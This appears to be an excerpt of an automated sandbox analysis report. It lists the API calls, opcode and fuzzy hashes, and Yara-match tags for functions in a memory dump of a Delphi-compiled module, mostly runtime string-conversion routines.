                                                                                                  • API String ID: 2014283384-0
                                                                                                  • Opcode ID: b61eede90e767d8fde67cc97024370c853bfedd394de62c8fd1a2fb42fa9bf36
                                                                                                  • Instruction ID: 3378d5cb028a156183957ae48023e964bc14677264a5555a71f0aa01a3d2e280
                                                                                                  • Opcode Fuzzy Hash: b61eede90e767d8fde67cc97024370c853bfedd394de62c8fd1a2fb42fa9bf36
                                                                                                  • Instruction Fuzzy Hash: 7921C1317061A28FF714EE18E570A5EB3E5EBD2300FA1873AE945C7111EB22ED418751
                                                                                                  APIs
                                                                                                  • @System@@LStrSetLength$qqrv.RTL120 ref: 50008DC5
                                                                                                  • @System@@NewAnsiString$qqrius.RTL120 ref: 50008DD4
                                                                                                  • @System@Move$qqrpxvpvi.RTL120(00000000,00000000), ref: 50008E1A
                                                                                                  • @System@@LStrClr$qqrpv.RTL120(00000000), ref: 50008E28
                                                                                                  • @System@@LStrAsg$qqrpvpxv.RTL120 ref: 50008E3D
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  Similarity
                                                                                                  • API ID: System@@$AnsiAsg$qqrpvpxvClr$qqrpvLength$qqrvMove$qqrpxvpviString$qqriusSystem@
                                                                                                  • String ID:
                                                                                                  • API String ID: 3139303677-0
                                                                                                  • Opcode ID: ab1dadf1f8bb6f253b1950cb49ad492068fbeb85a1bae5a0dea0bc8e953f108d
                                                                                                  • Instruction ID: 8200d2bf4dcf9fe215388774a5c81f53f67553e226669b9bf43c0643cec0f83f
                                                                                                  • Opcode Fuzzy Hash: ab1dadf1f8bb6f253b1950cb49ad492068fbeb85a1bae5a0dea0bc8e953f108d
                                                                                                  • Instruction Fuzzy Hash: C2219E713092828BE714EE19E9B0A6AB3E6FFE0300FA14B6BDAC5C7251DB31DC518751
                                                                                                  APIs
                                                                                                  • @System@@LStrAddRef$qqrpv.RTL120 ref: 500279F6
                                                                                                  • @System@@InternalLStrFromUStr$qqrr27System@%AnsiStringT$us$i0$%x20System@UnicodeStringus.RTL120(00000000,50027ABC), ref: 50027A2F
                                                                                                  • @System@@InternalLStrFromUStr$qqrr27System@%AnsiStringT$us$i0$%x20System@UnicodeStringus.RTL120(00000000,50027ABC), ref: 50027A79
                                                                                                  • @Sysutils@NextCharIndex$qqrx27System@%AnsiStringT$us$i0$%i.RTL120(00000000,50027ABC), ref: 50027A96
                                                                                                  • @System@@LStrClr$qqrpv.RTL120(50027AC3), ref: 50027AB6
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  Similarity
                                                                                                  • API ID: System@@$AnsiStringSystem@%$FromInternalStr$qqrr27StringusSystem@T$us$i0$%x20Unicode$CharClr$qqrpvIndex$qqrx27NextRef$qqrpvSysutils@T$us$i0$%i
                                                                                                  • String ID:
                                                                                                  • API String ID: 3584664094-0
                                                                                                  • Opcode ID: 829ff8f312fc26a680b5dcbd4d1ee6f714a82b71f8e0defcbae22146eaef4f83
                                                                                                  • Instruction ID: 5ba0f4aa9d540899a6946def5b7f71f7a7c44f4c34a077cce08fafb771b80344
                                                                                                  • Opcode Fuzzy Hash: 829ff8f312fc26a680b5dcbd4d1ee6f714a82b71f8e0defcbae22146eaef4f83
                                                                                                  • Instruction Fuzzy Hash: 8921C430A06186EFEB11DFA4EA51ABDB7F5EBC4220F6002B5D448E7251D770AF41DB92
                                                                                                  APIs
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5000A525), ref: 5000A4A0
                                                                                                    • Part of subcall function 50008994: @System@@UStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(?,500089BC,50006B15,00000000,50006B69), ref: 50008999
                                                                                                  • @System@@UStrFromPWCharLen$qqrr20System@UnicodeStringpbi.RTL120(00000000,5000A525), ref: 5000A4F9
                                                                                                  • @System@@UStrFromPCharLen$qqrr20System@UnicodeStringpci.RTL120(00000000,5000A525), ref: 5000A50A
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  Similarity
                                                                                                  • API ID: FromSystem@System@@Unicode$AnsiCharLen$qqrr20Str$qqrr20StringStringx27System@%T$us$i0$%$InternalStringpbiStringpci
                                                                                                  • String ID:
                                                                                                  • API String ID: 1942119235-0
                                                                                                  • Opcode ID: fadb6b95d5fb1038a6ee0d324fefe7ba47ecd192cbbc44abc22f50522fcb7868
                                                                                                  • Instruction ID: ad8f59b466486c7b54756af4fb6304d0c882565156628c1f2bc0eb5e63542440
                                                                                                  • Opcode Fuzzy Hash: fadb6b95d5fb1038a6ee0d324fefe7ba47ecd192cbbc44abc22f50522fcb7868
                                                                                                  • Instruction Fuzzy Hash: 772108347025A4DFFB11DE64D9A55ADB3E5EBD6210BE04375E800C7305DBB4DE01D691
                                                                                                  APIs
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,50027B99,?,?,?,?), ref: 50027B18
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,50027B99,?,?,?,?), ref: 50027B52
                                                                                                  • @Sysutils@NextCharIndex$qqrx20System@UnicodeStringi.RTL120(00000000,50027B99,?,?,?,?), ref: 50027B71
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: System@Unicode$AnsiFromInternalStr$qqrr20StringStringx27System@%System@@T$us$i0$%$CharIndex$qqrx20NextStringiSysutils@
                                                                                                  • String ID:
                                                                                                  • API String ID: 112165042-0
                                                                                                  • Opcode ID: 5ab0ca6b7efa682e0a8c0cf649096109340480c0a6d78f3667cd2438d1eb862a
                                                                                                  • Instruction ID: 35ce13431533dfb919b24986911c6e13b21b563e3ea2f71161cf238d0aa8309e
                                                                                                  • Opcode Fuzzy Hash: 5ab0ca6b7efa682e0a8c0cf649096109340480c0a6d78f3667cd2438d1eb862a
                                                                                                  • Instruction Fuzzy Hash: BE21B631A0218AEFDF12DFA4EA417ADB7F5EF45310F6042A2D508A7151D3749E40DB90
                                                                                                  APIs
                                                                                                  • @Sysutils@Exception@$bctr$qqrx20System@UnicodeString.RTL120(00000000,50027182), ref: 50027108
                                                                                                  • @System@LoadResString$qqrp20System@TResStringRec.RTL120(00000000,?,00000000,50027182), ref: 50027136
                                                                                                  • @Sysutils@Exception@$bctr$qqrx20System@UnicodeStringpx14System@TVarRecxi.RTL120(00000000,?,00000000,50027182), ref: 50027145
                                                                                                  • @System@@IsClass$qqrp14System@TObjectp17System@TMetaClass.RTL120(00000000,50027182), ref: 50027154
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: System@$Exception@$bctr$qqrx20StringSysutils@Unicode$ClassClass$qqrp14LoadMetaObjectp17RecxiString$qqrp20Stringpx14System@@
                                                                                                  • String ID:
                                                                                                  • API String ID: 3708808660-0
                                                                                                  • Opcode ID: 114fbacdc6cb7fb3462a26799a0944743581bf824f00dcc18a41d0bfae1d8de9
                                                                                                  • Instruction ID: 33e2ff48ece4c1c09eb1b0648f1bee825e15256ae891d4046b3df70333a380a6
                                                                                                  • Opcode Fuzzy Hash: 114fbacdc6cb7fb3462a26799a0944743581bf824f00dcc18a41d0bfae1d8de9
                                                                                                  • Instruction Fuzzy Hash: F72192346015469FDB10CFACED919ADB7F5FF49300F508666E508D73A5DA30AE04CB90
                                                                                                  APIs
                                                                                                  • @System@SetInOutRes$qqri.RTL120(?,?,?,50005AE5), ref: 50005A13
                                                                                                  • CreateFileW.KERNEL32(00000000,C0000000,?,00000000,00000002,00000080,00000000), ref: 50005A88
                                                                                                  • GetStdHandle.KERNEL32(000000F5), ref: 50005AA8
                                                                                                  • GetLastError.KERNEL32(000000F5), ref: 50005ABC
                                                                                                  • @System@SetInOutRes$qqri.RTL120(000000F5), ref: 50005AC1
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Res$qqriSystem@$CreateErrorFileHandleLast
                                                                                                  • String ID:
                                                                                                  • API String ID: 2961129769-0
                                                                                                  • Opcode ID: d63abc15d01510dc30b575c880705f7218f0e4a71d622e56fee6778df18cb518
                                                                                                  • Instruction ID: def1b6819490b2fa9b0a5e09cb0acd6702a6deccba95574e8a0b2e564d39748f
                                                                                                  • Opcode Fuzzy Hash: d63abc15d01510dc30b575c880705f7218f0e4a71d622e56fee6778df18cb518
                                                                                                  • Instruction Fuzzy Hash: B4113A61305281DAFB14DF58CCE079BA9959F87212FA4C356E5048F2E6E778CC40C397
                                                                                                  APIs
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,500285AC,?,?,?,?,5002872E,?,?,00000001,5001BE14,00000000,5001BEBF,?,?,00000000), ref: 50028538
                                                                                                    • Part of subcall function 50008994: @System@@UStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(?,500089BC,50006B15,00000000,50006B69), ref: 50008999
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,500285AC,?,?,?,?,5002872E,?,?,00000001,5001BE14,00000000,5001BEBF,?,?,00000000), ref: 5002856B
                                                                                                  • @Sysutils@ByteType$qqrx20System@UnicodeStringi.RTL120(00000000,500285AC,?,?,?,?,5002872E,?,?,00000001,5001BE14,00000000,5001BEBF,?,?,00000000), ref: 50028586
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: System@Unicode$AnsiFromStr$qqrr20StringStringx27System@%System@@T$us$i0$%$Internal$ByteStringiSysutils@Type$qqrx20
                                                                                                  • String ID:
                                                                                                  • API String ID: 2787194164-0
                                                                                                  • Opcode ID: eec2c889b96c63f28c6d912a4f2a099ea762f16bceb9a5f7ed7734ac0c1a855f
                                                                                                  • Instruction ID: f94e552c94311d6681ea6b9088efd7c55080737d05d2957480002ee94c899e9e
                                                                                                  • Opcode Fuzzy Hash: eec2c889b96c63f28c6d912a4f2a099ea762f16bceb9a5f7ed7734ac0c1a855f
                                                                                                  • Instruction Fuzzy Hash: 9C11BE38B03A96DBDF01DEB8EA825AEB3F9EF442407A086B5E500D3161E770EE01D750
                                                                                                  APIs
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,50015AB9), ref: 50015A64
                                                                                                    • Part of subcall function 50008994: @System@@UStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(?,500089BC,50006B15,00000000,50006B69), ref: 50008999
                                                                                                  • @System@@UStrSetLength$qqrr20System@UnicodeStringi.RTL120(00000000,50015AB9), ref: 50015A7B
                                                                                                  • @System@Move$qqrpxvpvi.RTL120(00000000,50015AB9), ref: 50015A93
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: System@$System@@Unicode$AnsiFromStr$qqrr20StringStringx27System@%T$us$i0$%$InternalLength$qqrr20Move$qqrpxvpviStringi
                                                                                                  • String ID:
                                                                                                  • API String ID: 986796861-0
                                                                                                  • Opcode ID: 10025f9b933ecd5712bc93f26f254c4d90db7b168fed868ef1a57108d806b3bb
                                                                                                  • Instruction ID: 273e415b261a473a3476493ac361f3ac1f54f6cd7220035dc33fede40ddaa886
                                                                                                  • Opcode Fuzzy Hash: 10025f9b933ecd5712bc93f26f254c4d90db7b168fed868ef1a57108d806b3bb
                                                                                                  • Instruction Fuzzy Hash: F3110031740284DFEB04CBA9DDD29AAB3F9EF996007E4037AE904CB311EB70DE408691
                                                                                                  APIs
                                                                                                  • @System@@WStrClr$qqrpv.RTL120(?,?,?), ref: 50009611
                                                                                                    • Part of subcall function 50009588: SysFreeString.OLEAUT32(?), ref: 50009596
                                                                                                  • @System@@WStrFromPWCharLen$qqrr17System@WideStringpbi.RTL120(?,?,?,?,?), ref: 5000964A
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: System@@$CharClr$qqrpvFreeFromLen$qqrr17StringStringpbiSystem@Wide
                                                                                                  • String ID:
                                                                                                  • API String ID: 4035486651-0
                                                                                                  • Opcode ID: 58788c31a9392e6549bcfa84bf31123cf4ff7a055d905c796c92d66516e9aead
                                                                                                  • Instruction ID: f7e519a3914915a7ddd12a0a43312b4a76140a576ef5cdbbdeb6b3b112df9300
                                                                                                  • Opcode Fuzzy Hash: 58788c31a9392e6549bcfa84bf31123cf4ff7a055d905c796c92d66516e9aead
                                                                                                  • Instruction Fuzzy Hash: 9111CE31B0564957AB00DAA9D8E18CFB2DA9FA8210B944337BA04E3312DEB6DE4447D0
                                                                                                  APIs
                                                                                                  • @System@@LStrAddRef$qqrpv.RTL120 ref: 50027895
                                                                                                  • @System@@InternalLStrFromUStr$qqrr27System@%AnsiStringT$us$i0$%x20System@UnicodeStringus.RTL120(00000000,50027920), ref: 500278C2
                                                                                                    • Part of subcall function 500089C4: @System@@LStrFromUStr$qqrr27System@%AnsiStringT$us$i0$%x20System@UnicodeStringus.RTL120 ref: 500089C9
                                                                                                  • @System@@InternalLStrFromUStr$qqrr27System@%AnsiStringT$us$i0$%x20System@UnicodeStringus.RTL120(00000000,50027920), ref: 500278EE
                                                                                                  • @Sysutils@ByteToCharIndex$qqrx27System@%AnsiStringT$us$i0$%i.RTL120(00000000,50027920), ref: 50027903
                                                                                                  • @System@@LStrClr$qqrpv.RTL120(50027927), ref: 5002791A
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: System@@$AnsiStringSystem@%$FromStr$qqrr27StringusSystem@T$us$i0$%x20Unicode$Internal$ByteCharClr$qqrpvIndex$qqrx27Ref$qqrpvSysutils@T$us$i0$%i
                                                                                                  • String ID:
                                                                                                  • API String ID: 4214602929-0
                                                                                                  APIs
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,500279C4,?,?,?,?,500279E1,50022AF3,00000000,00000004,?,00000000,?,00000100,00000000,50022B5C), ref: 50027968
                                                                                                    • Part of subcall function 50008994: @System@@UStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(?,500089BC,50006B15,00000000,50006B69), ref: 50008999
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,500279C4,?,?,?,?,500279E1,50022AF3,00000000,00000004,?,00000000,?,00000100,00000000,50022B5C), ref: 50027992
                                                                                                  • @Sysutils@ByteToCharIndex$qqrx20System@UnicodeStringi.RTL120(00000000,500279C4,?,?,?,?,500279E1,50022AF3,00000000,00000004,?,00000000,?,00000100,00000000,50022B5C), ref: 500279A7
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: System@Unicode$AnsiFromStr$qqrr20StringStringx27System@%System@@T$us$i0$%$Internal$ByteCharIndex$qqrx20StringiSysutils@
                                                                                                  • String ID:
                                                                                                  • API String ID: 1663083771-0
                                                                                                  APIs
                                                                                                  • @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000), ref: 5000A1A4
                                                                                                    • Part of subcall function 50009D40: @System@@NewUnicodeString$qqri.RTL120(00000000,?,50004742), ref: 50009D5B
                                                                                                    • Part of subcall function 50009D40: @System@Move$qqrpxvpvi.RTL120(00000000,?,50004742), ref: 50009D69
                                                                                                    • Part of subcall function 50009D40: @System@@FreeMem$qqrpv.RTL120(50004742), ref: 50009D8B
                                                                                                  • @System@@UStrSetLength$qqrr20System@UnicodeStringi.RTL120 ref: 5000A18D
                                                                                                    • Part of subcall function 5000A0CC: @System@@UStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,00000001,00000000,?,5000467F,?,?,00000000,?,500046F0,00000000,5000471D,?,?,?,00000000), ref: 5000A0EC
                                                                                                    • Part of subcall function 5000A0CC: @System@@ReallocMem$qqrrpvi.RTL120(?,00000001,00000000,?,5000467F,?,?,00000000,?,500046F0,00000000,5000471D,?,?,?,00000000), ref: 5000A10D
                                                                                                    • Part of subcall function 5000A0CC: @System@@LStrClr$qqrpv.RTL120(00000000,00000001,00000000,?,5000467F,?,?,00000000,?,500046F0,00000000,5000471D,?,?,?,00000000), ref: 5000A128
                                                                                                  • @System@Move$qqrpxvpvi.RTL120(00000000), ref: 5000A1B7
                                                                                                  • @System@@LStrClr$qqrpv.RTL120(00000000), ref: 5000A1C4
                                                                                                  • @System@@UStrSetLength$qqrr20System@UnicodeStringi.RTL120 ref: 5000A1CE
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: System@@$System@$Unicode$Clr$qqrpvLength$qqrr20Move$qqrpxvpviStringStringi$AnsiAsg$qqrr20FreeFromMem$qqrpvMem$qqrrpviReallocStr$qqrr20String$qqriStringx20Stringx27System@%T$us$i0$%
                                                                                                  • String ID:
                                                                                                  • API String ID: 87712638-0
                                                                                                  APIs
                                                                                                  • FindNextFileW.KERNEL32(?,?), ref: 5001C059
                                                                                                  • GetLastError.KERNEL32(?,?), ref: 5001C062
                                                                                                  • FileTimeToLocalFileTime.KERNEL32(?), ref: 5001C078
                                                                                                  • FileTimeToDosDateTime.KERNEL32(?,?,?), ref: 5001C087
                                                                                                  • @System@@UStrFromWArray$qqrr20System@UnicodeStringpbi.RTL120 ref: 5001C0BD
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: FileTime$Array$qqrr20DateErrorFindFromLastLocalNextStringpbiSystem@System@@Unicode
                                                                                                  • String ID:
                                                                                                  • API String ID: 2911837428-0
                                                                                                  APIs
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5001A7D5), ref: 5001A780
                                                                                                    • Part of subcall function 50008994: @System@@UStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(?,500089BC,50006B15,00000000,50006B69), ref: 50008999
                                                                                                  • @System@@EnsureUnicodeString$qqrr20System@UnicodeString.RTL120(00000000,5001A7D5), ref: 5001A79F
                                                                                                  • @System@@UStrCopy$qqrx20System@UnicodeStringii.RTL120(?,00000000,5001A7D5), ref: 5001A7BA
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Unicode$System@System@@$String$AnsiFromStr$qqrr20Stringx27System@%T$us$i0$%$Copy$qqrx20EnsureInternalString$qqrr20Stringii
                                                                                                  • String ID:
                                                                                                  • API String ID: 983657741-0
                                                                                                  APIs
                                                                                                  • @System@TMonitor@CheckOwningThread$qqrv.RTL120 ref: 50007749
                                                                                                    • Part of subcall function 50007234: GetCurrentThreadId.KERNEL32 ref: 50007238
                                                                                                    • Part of subcall function 50007234: @System@Error$qqr20System@TRuntimeError.RTL120 ref: 50007243
                                                                                                  • @System@TMonitor@QueueWaiter$qqrr30System@TMonitor@TWaitingThread.RTL120(00000000,500077CE), ref: 50007773
                                                                                                  • @System@TMonitor@Exit$qqrv.RTL120(00000000,500077CE), ref: 50007781
                                                                                                    • Part of subcall function 500074A4: @System@TMonitor@CheckOwningThread$qqrv.RTL120 ref: 500074AA
                                                                                                    • Part of subcall function 500074A4: @System@TMonitor@GetEvent$qqrv.RTL120 ref: 500074D9
                                                                                                  • @System@TMonitor@Enter$qqrui.RTL120(?), ref: 500077A2
                                                                                                    • Part of subcall function 5000730C: @System@TMonitor@TryEnter$qqrv.RTL120 ref: 5000731C
                                                                                                    • Part of subcall function 5000730C: GetTickCount.KERNEL32 ref: 50007343
                                                                                                    • Part of subcall function 5000730C: GetTickCount.KERNEL32 ref: 50007355
                                                                                                  • @System@TMonitor@RemoveWaiter$qqrr30System@TMonitor@TWaitingThread.RTL120(?), ref: 500077AC
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: System@$Monitor@$Thread$CheckCountOwningThread$qqrvTickWaiter$qqrr30Waiting$CurrentEnter$qqruiEnter$qqrvErrorError$qqr20Event$qqrvExit$qqrvQueueRemoveRuntime
                                                                                                  • String ID:
                                                                                                  • API String ID: 3245137772-0
                                                                                                  APIs
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5002845F,?,?,00000001,?,?,5001D415,?,00000000,5001D4A4), ref: 50028410
                                                                                                    • Part of subcall function 50008994: @System@@UStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(?,500089BC,50006B15,00000000,50006B69), ref: 50008999
                                                                                                  • @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(00000000,5002845F,?,?,00000001,?,?,5001D415,?,00000000,5001D4A4), ref: 5002842B
                                                                                                  • @Sysutils@StrCharLength$qqrpxb.RTL120(00000000,5002845F,?,?,00000001,?,?,5001D415,?,00000000,5001D4A4), ref: 50028439
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: StringSystem@System@@Unicode$AnsiFromStr$qqrr20Stringx27System@%T$us$i0$%$CharChar$qqrx20InternalLength$qqrpxbSysutils@
                                                                                                  • String ID:
                                                                                                  • API String ID: 3042977434-0
                                                                                                  • Opcode ID: 35d1e42feb42f13eecb656c74661683a5158f8c6915138d9e1fd8d021dc4de57
                                                                                                  • Instruction ID: 36fcfea0c2849a8d324b642c74e4cb449ffd548fbf6f67616c7ea078cdc77676
                                                                                                  • Opcode Fuzzy Hash: 35d1e42feb42f13eecb656c74661683a5158f8c6915138d9e1fd8d021dc4de57
                                                                                                  • Instruction Fuzzy Hash: A201F935A031979FEB00EFA4EC42599B3FAEF843007958772E904A3625E7399E00D350
                                                                                                  APIs
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5001A86A), ref: 5001A81D
                                                                                                    • Part of subcall function 50008994: @System@@UStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(?,500089BC,50006B15,00000000,50006B69), ref: 50008999
                                                                                                  • @System@@EnsureUnicodeString$qqrr20System@UnicodeString.RTL120(00000000,5001A86A), ref: 5001A837
                                                                                                  • @System@@UStrCopy$qqrx20System@UnicodeStringii.RTL120(?,00000000,5001A86A), ref: 5001A84F
                                                                                                  Similarity
                                                                                                  • API ID: Unicode$System@System@@$String$AnsiFromStr$qqrr20Stringx27System@%T$us$i0$%$Copy$qqrx20EnsureInternalString$qqrr20Stringii
                                                                                                  • String ID:
                                                                                                  • API String ID: 983657741-0
                                                                                                  • Opcode ID: 74344b50583a924356235f014e24c58766c9e58c312ed4462f199f85a523a2ea
                                                                                                  • Instruction ID: 132a61221e42f68fe096f2f0703ce72c7c0d537a3ed7cef0da9aebb690a8ca7d
                                                                                                  • Opcode Fuzzy Hash: 74344b50583a924356235f014e24c58766c9e58c312ed4462f199f85a523a2ea
                                                                                                  • Instruction Fuzzy Hash: 6301B930A11399EFEB14DFA9DD529ADB3F8FF4A200BA04276E500D3111EB70DE41D691
                                                                                                  APIs
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,500158BE), ref: 50015874
                                                                                                    • Part of subcall function 50008994: @System@@UStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(?,500089BC,50006B15,00000000,50006B69), ref: 50008999
                                                                                                  • @System@@UStrCopy$qqrx20System@UnicodeStringii.RTL120(?,00000000,500158BE), ref: 50015891
                                                                                                  • @Sysutils@AnsiSameStr$qqrx20System@UnicodeStringt1.RTL120(?,00000000,500158BE), ref: 5001589C
                                                                                                  Similarity
                                                                                                  • API ID: System@Unicode$AnsiSystem@@$FromStr$qqrr20StringStringx27System@%T$us$i0$%$Copy$qqrx20InternalSameStr$qqrx20StringiiStringt1Sysutils@
                                                                                                  • String ID:
                                                                                                  • API String ID: 379066412-0
                                                                                                  • Opcode ID: c9586697ffbc2b73cdd91dbbcbba96766bafe00c22bacf04bf09434da6c89794
                                                                                                  • Instruction ID: 5f4c935dc7326f4b5ffd1e52cde991efdb19edfe8de5ec90e514678ba51a4583
                                                                                                  • Opcode Fuzzy Hash: c9586697ffbc2b73cdd91dbbcbba96766bafe00c22bacf04bf09434da6c89794
                                                                                                  • Instruction Fuzzy Hash: 15018030B00288EFEF01CFA8D99199EB7F9EF49300FA042B6E504E7245EB309E449651
                                                                                                  APIs
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5000D1E0,?,?,?,?,?,50007075), ref: 5000D199
                                                                                                    • Part of subcall function 50008994: @System@@UStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(?,500089BC,50006B15,00000000,50006B69), ref: 50008999
                                                                                                  • @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(?,00000000,5000D1E0,?,?,?,?,?,50007075), ref: 5000D1AD
                                                                                                  • @System@UnicodeToUtf8$qqrpcuipbui.RTL120(?,00000000,5000D1E0,?,?,?,?,?,50007075), ref: 5000D1BC
                                                                                                  Similarity
                                                                                                  • API ID: System@Unicode$StringSystem@@$AnsiFromStr$qqrr20Stringx27System@%T$us$i0$%$Char$qqrx20InternalUtf8$qqrpcuipbui
                                                                                                  • String ID:
                                                                                                  • API String ID: 3779820642-0
                                                                                                  • Opcode ID: 92ff47a1b225b4d742312c647edfc1f9fd4c817f481cd0b4d27eeb15f79c464d
                                                                                                  • Instruction ID: e04ebdc101fc4bf289a004674db906102c3d27fd8c3307898635fa4b721bd642
                                                                                                  • Opcode Fuzzy Hash: 92ff47a1b225b4d742312c647edfc1f9fd4c817f481cd0b4d27eeb15f79c464d
                                                                                                  • Instruction Fuzzy Hash: A1017534611A85BFBB11CFB9D9B199AB7F9EF492007D04677E504D3601EA30EE01D660
                                                                                                  APIs
                                                                                                  • @System@@IntfClear$qqrr45System@%DelphiInterface$t17System@IInterface%.RTL120(00000000,5002B1CF,?,?,?,?,00000000), ref: 5002B17B
                                                                                                  • @System@TObject@GetInterface$qqrrx5_GUIDpv.RTL120(00000000,5002B1CF,?,?,?,?,00000000), ref: 5002B189
                                                                                                    • Part of subcall function 50006CB4: @System@TObject@GetInterfaceEntry$qqrrx5_GUID.RTL120(00000000,50006D38), ref: 50006CE0
                                                                                                    • Part of subcall function 50006CB4: @System@@IntfClear$qqrr45System@%DelphiInterface$t17System@IInterface%.RTL120(50006D3F), ref: 50006D32
                                                                                                  • @Sysutils@Supports$qqrx45System@%DelphiInterface$t17System@IInterface%rx5_GUIDpv.RTL120(00000000,5002B1CF,?,?,?,?,00000000), ref: 5002B199
                                                                                                  • @System@TObject@GetInterface$qqrrx5_GUIDpv.RTL120(00000000,5002B1CF,?,?,?,?,00000000), ref: 5002B1A8
                                                                                                  • @System@@IntfClear$qqrr45System@%DelphiInterface$t17System@IInterface%.RTL120(5002B1D6,?,?,?,00000000), ref: 5002B1C9
                                                                                                  Similarity
                                                                                                  • API ID: System@$DelphiInterface$t17System@%$Clear$qqrr45Interface%IntfObject@System@@$Interface$qqrrx5_$Entry$qqrrx5_InterfaceInterface%rx5_Supports$qqrx45Sysutils@
                                                                                                  • String ID:
                                                                                                  • API String ID: 3577717398-0
                                                                                                  • Opcode ID: e289cbe9458d8958e45cc763ccf8e6ca795d0cba2e6690692d1028c7d287d737
